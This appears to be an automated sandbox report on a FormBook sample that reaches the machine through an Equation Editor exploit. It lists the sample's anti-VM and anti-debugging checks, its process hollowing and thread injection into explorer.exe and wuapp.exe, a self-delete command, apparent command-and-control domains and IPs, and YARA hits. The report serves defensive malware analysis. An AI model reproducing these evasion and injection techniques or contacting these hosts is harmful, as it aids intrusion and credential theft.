Source: C:\Users\Public\vbc.exe Code function: 8_2_0041C4EE push 133511A3h; retf 8_2_0041C4F3
Source: C:\Users\Public\vbc.exe Code function: 8_2_00414D71 push ss; iretd 8_2_00414D72
Source: C:\Users\Public\vbc.exe Code function: 8_2_00415D38 pushad ; ret 8_2_00415D4B
Source: C:\Users\Public\vbc.exe Code function: 8_2_00E43BC5 push ecx; ret 8_2_00E43BD8
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_00BBDFA1 push ecx; ret 11_2_00BBDFB4
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_000E62F6 pushfd ; ret 11_2_000E62F7
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_000FB3C5 push eax; ret 11_2_000FB418
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_000F53FC push eax; retf 11_2_000F540B
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_000FB41B push eax; ret 11_2_000FB482
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_000FB412 push eax; ret 11_2_000FB418
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_000FB47C push eax; ret 11_2_000FB482
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_000FC4EE push 133511A3h; retf 11_2_000FC4F3
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_000F5CE7 pushad ; ret 11_2_000F5D4B
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_000F5D38 pushad ; ret 11_2_000F5D4B
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_000F4D71 push ss; iretd 11_2_000F4D72

Persistence and Installation Behavior:

Drops PE files
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\loader1[1].exe
Drops PE files to the user directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe

Boot Survival:

Drops PE files to the user root directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
Source: C:\Users\Public\vbc.exe Code function: 6_2_00E41450 lstrlenW,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,lstrlenW,StartServiceCtrlDispatcherW,GetLastError,GetProcessHeap,HeapFree, 6_2_00E41450

Hooking and other Techniques for Hiding and Protection:

Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\Public\vbc.exe Code function: 6_2_00E43005 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 6_2_00E43005
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wuapp.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 00000000004085F4 second address: 00000000004085FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wuapp.exe RDTSC instruction interceptor: First address: 00000000000E85F4 second address: 00000000000E85FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wuapp.exe RDTSC instruction interceptor: First address: 00000000000E898E second address: 00000000000E8994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1348 Thread sleep time: -300000s >= -30000s
Source: C:\Windows\SysWOW64\wuapp.exe TID: 1936 Thread sleep time: -34000s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\wuapp.exe Last function: Thread delayed
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\vbc.exe Code function: 8_2_004088C0 rdtsc 8_2_004088C0
Source: C:\Users\Public\vbc.exe Process information queried: ProcessInformation
Source: explorer.exe, 0000000A.00000000.483971283.0000000000255000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000A.00000000.500231704.000000000457A000.00000004.00000001.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
Source: explorer.exe, 0000000A.00000000.500231704.000000000457A000.00000004.00000001.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
Source: explorer.exe, 0000000A.00000000.500194477.000000000456F000.00000004.00000001.sdmp Binary or memory string: scsi\disk&ven_vmware&prod_virtual_disk\5&22be343f&0&000000
Source: explorer.exe, 0000000A.00000000.508832469.00000000044E7000.00000004.00000001.sdmp Binary or memory string: ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0
Source: explorer.exe, 0000000A.00000000.495394562.000000000029B000.00000004.00000020.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0*N
Source: explorer.exe, 0000000A.00000000.492175209.00000000045D6000.00000004.00000001.sdmp Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}

Anti Debugging:

Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\Public\vbc.exe Code function: 6_2_00E44EDA _memset,IsDebuggerPresent, 6_2_00E44EDA
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Source: C:\Users\Public\vbc.exe Code function: 6_2_00E45B05 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 6_2_00E45B05
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\Public\vbc.exe Code function: 6_2_00E410B0 ExpandEnvironmentStringsW,GetLastError,GetProcessHeap,HeapAlloc,ExpandEnvironmentStringsW,GetLastError,GetProcessHeap,HeapFree, 6_2_00E410B0
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\vbc.exe Code function: 8_2_004088C0 rdtsc 8_2_004088C0
Enables debug privileges
Source: C:\Users\Public\vbc.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\wuapp.exe Process token adjusted: Debug
Contains functionality to read the PEB
Source: C:\Users\Public\vbc.exe Code function: 6_2_001306DA mov eax, dword ptr fs:[00000030h] 6_2_001306DA
Source: C:\Users\Public\vbc.exe Code function: 6_2_00130A1C mov eax, dword ptr fs:[00000030h] 6_2_00130A1C
Source: C:\Users\Public\vbc.exe Code function: 6_2_001308EE mov eax, dword ptr fs:[00000030h] 6_2_001308EE
Source: C:\Users\Public\vbc.exe Code function: 6_2_0013099F mov eax, dword ptr fs:[00000030h] 6_2_0013099F
Source: C:\Users\Public\vbc.exe Code function: 6_2_001309DE mov eax, dword ptr fs:[00000030h] 6_2_001309DE
Source: C:\Users\Public\vbc.exe Code function: 8_2_009426F8 mov eax, dword ptr fs:[00000030h] 8_2_009426F8
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_00BC26F8 mov eax, dword ptr fs:[00000030h] 11_2_00BC26F8
Checks if the current process is being debugged
Source: C:\Users\Public\vbc.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\wuapp.exe Process queried: DebugPort
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\Public\vbc.exe Code function: 8_2_00409B30 LdrLoadDll, 8_2_00409B30
Source: C:\Users\Public\vbc.exe Code function: 6_2_00E44131 SetUnhandledExceptionFilter, 6_2_00E44131
Source: C:\Users\Public\vbc.exe Code function: 6_2_00E44162 SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_00E44162
Source: C:\Users\Public\vbc.exe Code function: 8_2_00E44162 SetUnhandledExceptionFilter,UnhandledExceptionFilter, 8_2_00E44162
Source: C:\Users\Public\vbc.exe Code function: 8_2_00E44131 SetUnhandledExceptionFilter, 8_2_00E44131

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 52.58.78.16 80
Source: C:\Windows\explorer.exe Network Connect: 209.99.64.51 80
Source: C:\Windows\explorer.exe Domain query: www.matcitekids.com
Source: C:\Windows\explorer.exe Network Connect: 50.87.248.20 80
Source: C:\Windows\explorer.exe Domain query: www.garimpeirastore.online
Source: C:\Windows\explorer.exe Domain query: www.doityourselfism.com
Source: C:\Windows\explorer.exe Network Connect: 169.62.91.142 80
Source: C:\Windows\explorer.exe Domain query: www.onedadtwodudes.com
Source: C:\Windows\explorer.exe Domain query: www.ecofingers.com
Sample uses process hollowing technique
Source: C:\Users\Public\vbc.exe Section unmapped: C:\Windows\SysWOW64\wuapp.exe base address: 1160000
Maps a DLL or memory area into another process
Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Users\Public\vbc.exe protection: execute and read and write
Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Windows\SysWOW64\wuapp.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\wuapp.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\wuapp.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Queues an APC in another process (thread injection)
Source: C:\Users\Public\vbc.exe Thread APC queued: target process: C:\Windows\explorer.exe
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\Public\vbc.exe Thread register set: target process: 1764
Source: C:\Windows\SysWOW64\wuapp.exe Thread register set: target process: 1764
Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Windows\SysWOW64\wuapp.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
Source: explorer.exe, 0000000A.00000000.504069603.0000000000750000.00000002.00020000.sdmp, wuapp.exe, 0000000B.00000002.692568002.0000000001170000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000000A.00000000.483971283.0000000000255000.00000004.00000020.sdmp Binary or memory string: ProgmanG
Source: explorer.exe, 0000000A.00000000.504069603.0000000000750000.00000002.00020000.sdmp, wuapp.exe, 0000000B.00000002.692568002.0000000001170000.00000002.00020000.sdmp Binary or memory string: !Progman
Source: explorer.exe, 0000000A.00000000.504069603.0000000000750000.00000002.00020000.sdmp, wuapp.exe, 0000000B.00000002.692568002.0000000001170000.00000002.00020000.sdmp Binary or memory string: Program Manager<

Language, Device and Operating System Detection:

Contains functionality to query CPU information (cpuid)
Source: C:\Users\Public\vbc.exe Code function: 6_2_00E474FC cpuid 6_2_00E474FC
Source: C:\Users\Public\vbc.exe Code function: 6_2_00E43A39 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 6_2_00E43A39

Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match File source: 00000006.00000002.480756395.00000000002C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.521464934.0000000000170000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.521514431.00000000002B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.691920173.00000000002D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000000.503236958.0000000009554000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000000.512918777.0000000009554000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.691808432.00000000000E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.691877071.0000000000250000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.521543777.0000000000400000.00000040.00020000.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected FormBook
Source: Yara match File source: 00000006.00000002.480756395.00000000002C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.521464934.0000000000170000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.521514431.00000000002B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.691920173.00000000002D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000000.503236958.0000000009554000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000000.512918777.0000000009554000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.691808432.00000000000E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.691877071.0000000000250000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.521543777.0000000000400000.00000040.00020000.sdmp, type: MEMORY